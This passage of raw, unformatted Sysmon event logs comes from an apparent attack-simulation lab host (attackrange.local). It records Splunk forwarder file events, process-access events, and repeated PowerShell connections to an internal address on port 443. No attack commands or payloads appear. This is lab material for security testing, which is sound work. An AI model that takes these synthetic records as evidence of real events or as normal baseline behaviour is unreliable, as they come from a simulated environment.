Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E305BA07A14722B18147109B17B22E1,SHA256=5790D6E47FB1F96BD9B4E9796FAC768840A29A920D2AB62B78822EA95D1ACDE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:50.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88522ABA8FF61DEC07DAA550461A2C87,SHA256=CF8A454550EB5012CC3ED10A7ED5414BEC4C1C349EE17695BE06B5173976898F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:15.897{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52504-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:15.250{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52503-false10.0.1.12-8000- 23542300x800000000000000035343079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:51.713{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D802BE2AA56A58C6F303C0490B9D84F4,SHA256=CF44ED30EC5122E5332B24DA84021F25CFD67461C51E49074EA2C1C1BC503F8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:52.713{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=858781942081C09D03A8396F22222B42,SHA256=9D5E004715158A79E7A047D5F23B706EFCA8F6F862AD9C96D641004B5CB06130,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:53.728{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811B42C9564B9F842359FA708259AEB4,SHA256=8CEF3BA495AE2253336D89819F74235AA926B0E43A596F8ED7679240DAA9777A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:54.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC074A99351A28012686360A379FDDA4,SHA256=1B4597D73171D8AE457DA853D74163CAE4EB465501927266CCDA4677F9A7A0D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:55.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3589E477D86119CC811A5BCECC0A9438,SHA256=AD4C7AC0E9904AEA72083DE3540993885B74E6D330626BDC136E041B6856BCB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:21.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52506-false10.0.1.12-8000- 354300x800000000000000035343084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:20.916{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52505-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:55.058{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9F42B4365A9A3C3A40A4328571EB04CF,SHA256=11A9C3E9E83782742F66D5B987B7FDF70790934ADF7645A1D8C145230A4D4FD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:56.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91235BEC5B355B6609CFBA7F741FF8E9,SHA256=5A915E02C333EB580A3CDA540A7E0BD358E0DA781D8D2D178CDDC4FFF3335EC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:57.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A653FF7FB69C1CF37D390018ABC56F6,SHA256=5001C99F4233C71DBD9E383B3D70AF455BE2B6211060E4131DEE9758C681186A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:57.309{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:58.954{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09527D9E866A5CDE6C49CD90AB87730,SHA256=8DBA3488894A06CF27602E6BB5FF361226461BB570396D6963ECE9DEF25C2D6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:59.969{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A50560D4066B733AFC8C1249B1B9C895,SHA256=C08409D8553130A7847243E512D1D7B348E07254D9E36104695D075B0B24975F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:24.928{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52507-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000035343092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:02:59.107{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a654-0xf1923fd0) 23542300x800000000000000035343091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:59.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=241054CDC6190BF4C2A123D3E2E7CE7C,SHA256=06DDB97CA5FE7B2EB5809064E80A4A1E89194FAA763781D059261687CDF959D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:00.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5938A31C130483178A78D4C2C2445B9D,SHA256=E37A025016DFE101B4848B18C1C2C7AF1A9859AEF8809F1A586D98194B0114A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:26.210{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52508-false10.0.1.12-8000- 354300x800000000000000035343097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:26.088{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse10.0.1.14WIN-DC-128123ntp 23542300x800000000000000035343096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:00.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67AD216EAED004F8911456EADB015327,SHA256=DF323FA5EB9E3B7B8F1DBFA238B4ADBF4DC6B23AFC492B135A9732E2D650CDCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:00.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D625CA3F55989F82EE03F9C65F9F5B8F,SHA256=58C465FBE2A86201578A1DA946B03A11C6F8D13A26BC096DD18D77AE0BF83497,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:02.005{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB679A23E21DFADEB25BA5209132FFB3,SHA256=EA33B063C2D63938A97DFE2879E4AA9B986F3555868137C52434BFDD7B40B0B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:03.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4B714536194D09F1CE013B7EAF86F2DC,SHA256=F38CC8142C38805BEEC75F9B64603625DCA7E21F049C1DBDE8ECE4E7B5340703,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:03.036{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C5C8603C74FB85AC62F43C4495EF21,SHA256=C5E590A57C249CAC4EBD65E93F8275BB84A158B21F9935F14EF777311F8A8BFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:29.940{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52509-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035343120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73A8-613B-4DB4-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-73A8-613B-4DB4-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.752{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73A8-613B-4DB4-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.737{B81B27B7-73A8-613B-4DB4-03000000C801}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.237{B81B27B7-73A8-613B-4CB4-03000000C801}53481052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.067{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C228074EC2D4D547FE95F6941F371DBF,SHA256=4F0A8675CC6B122B07A0304A98734E74BEB0A4DB0A8EB93950CC569941418498,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73A8-613B-4CB4-03000000C801}5348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:03:04.051{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 